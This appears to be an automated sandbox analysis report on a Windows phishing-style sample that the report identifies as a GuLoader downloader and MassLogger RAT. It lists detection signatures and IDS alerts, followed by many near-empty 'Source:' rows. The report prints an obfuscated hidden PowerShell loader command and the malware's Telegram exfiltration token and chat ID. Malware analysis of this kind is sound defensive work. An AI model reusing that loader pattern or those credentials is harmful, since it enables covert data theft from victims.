Edit tour
Windows
Analysis Report
November Quotation.exe
Overview
General Information
| Sample name: | November Quotation.exe |
| Analysis ID: | 1562309 |
| MD5: | ebfe0469ca7e7a5ca4957b72bf4b1a48 |
| SHA1: | a5abd780240905f85846a2eb91b17ffbfed640ab |
| SHA256: | 5d68fc50b0a3cef7accabd9c3195998c04a0adae0a7e8b3fac3881f5c5397305 |
| Tags: | exeuser-adrian__luca |
| Infos: |   |
 | |
Detection
GuLoader, MassLogger RAT
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Classification
- System is w10x64
November Quotation.exe (PID: 7800 cmdline: "C:\Users\ user\Deskt op\Novembe r Quotatio n.exe" MD5: EBFE0469CA7E7A5CA4957B72BF4B1A48) 
powershell.exe (PID: 7864 cmdline: powershell .exe -wind owstyle hi dden "$Men dicity=Get -Content - raw 'C:\Us ers\user\A ppData\Loc al\sognene s\iconogra ph\Saddelk napperne.S rv';$Umisk endelighed =$Mendicit y.SubStrin g(5275,3); .$Umiskend elighed($M endicity) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 7872 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
msiexec.exe (PID: 6492 cmdline: "C:\Window s\SysWOW64 \msiexec.e xe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
{"EXfil Mode": "Telegram", "Telegram Token": "7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8", "Telegram Chatid": "6283883842"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security | ||
| JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
| JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
| JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
System Summary |   |
|---|
| Source: | Author: frack113: | ||
| Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-25T13:47:43.098496+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49871 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:47:46.772175+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49881 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:47:50.431287+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49891 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:47:53.739392+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49902 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:47:57.177157+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49909 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:00.630012+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49921 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:04.249756+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49929 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:07.632635+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49940 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:10.896009+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49947 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:14.213747+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49958 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:17.661828+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49966 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:21.001411+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49977 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:24.453386+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49985 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:27.885837+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49996 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:31.633855+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 50004 | 149.154.167.220 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-25T13:47:38.326543+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49859 | 193.122.130.0 | 80 | TCP |
| 2024-11-25T13:47:40.889059+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49859 | 193.122.130.0 | 80 | TCP |
| 2024-11-25T13:47:44.623459+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49877 | 193.122.130.0 | 80 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-25T13:47:31.093531+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49838 | 172.217.19.174 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Malware Configuration Extractor: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
Location Tracking | |
|---|
| Source: | DNS query: | ||
| Source: | Static PE information: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 0_2_004060E4 | |
| Source: | Code function: | 0_2_0040276E | |
| Source: | Code function: | 0_2_00405629 | |
| Source: | Code function: | 5_2_029FEC70 | |
| Source: | Code function: | 5_2_26E644C8 | |
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | JA3 fingerprint: | ||
| Source: | JA3 fingerprint: | ||
| Source: | JA3 fingerprint: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Code function: | 0_2_0040518A | |
System Summary | |
|---|
| Source: | Static PE information: | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | Code function: | 0_2_00403229 | |
| Source: | File created: | Jump to behavior | ||
| Source: | Code function: | 0_2_00406547 | |
| Source: | Code function: | 0_2_00406D1E | |
| Source: | Code function: | 0_2_004049C7 | |
| Source: | Code function: | 5_2_029F4328 | |
| Source: | Code function: | 5_2_029F2DD1 | |
| Source: | Code function: | 5_2_029FEC70 | |
| Source: | Code function: | 5_2_029FEC60 | |
| Source: | Code function: | 5_2_029F8DA0 | |
| Source: | Code function: | 5_2_029F5968 | |
| Source: | Code function: | 5_2_029F5F90 | |
| Source: | Code function: | 5_2_26E63348 | |
| Source: | Code function: | 5_2_26E644C8 | |
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Classification label: | ||
| Source: | Code function: | 0_2_00404481 | |
| Source: | Code function: | 0_2_0040206A | |
| Source: | File created: | Jump to behavior | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Static PE information: | ||
| Source: | WMI Queries: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | ReversingLabs: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Window detected: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Binary string: | ||
Data Obfuscation | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | Anti Malware Scan Interface: | ||
| Source: | Anti Malware Scan Interface: | ||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Code function: | 0_2_0040610B | |
| Source: | Code function: | 2_2_076B8460 | |
| Source: | Code function: | 2_2_076B8610 | |
| Source: | Code function: | 2_2_076BD8FB | |
| Source: | Code function: | 2_2_076BF6B3 | |
| Source: | Code function: | 2_2_08FC5DFA | |
| Source: | Code function: | 2_2_08FC3E1A | |
| Source: | Code function: | 2_2_08FCB400 | |
| Source: | Code function: | 2_2_08FC3FEC | |
| Source: | Code function: | 2_2_08FC5DFA | |
| Source: | Code function: | 2_2_08FC019D | |
| Source: | Code function: | 2_2_08FCD765 | |
| Source: | Code function: | 5_2_029FE791 | |
| Source: | Code function: | 5_2_029FE829 | |
| Source: | Code function: | 5_2_029F7BF8 | |
| Source: | Code function: | 5_2_029F78E7 | |
| Source: | Code function: | 5_2_029F7DA8 | |
| Source: | Code function: | 5_2_03E9B400 | |
| Source: | Code function: | 5_2_03E9019D | |
| Source: | Code function: | 5_2_03E9D765 | |
| Source: | Code function: | 5_2_03E93FEC | |
| Source: | Code function: | 5_2_03E95DFA | |
| Source: | Code function: | 5_2_03E93E1A | |
| Source: | Code function: | 5_2_03E95DFA | |
| Source: | Code function: | 5_2_26E64175 | |
| Source: | File created: | Jump to dropped file | ||
Hooking and other Techniques for Hiding and Protection | |
|---|
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
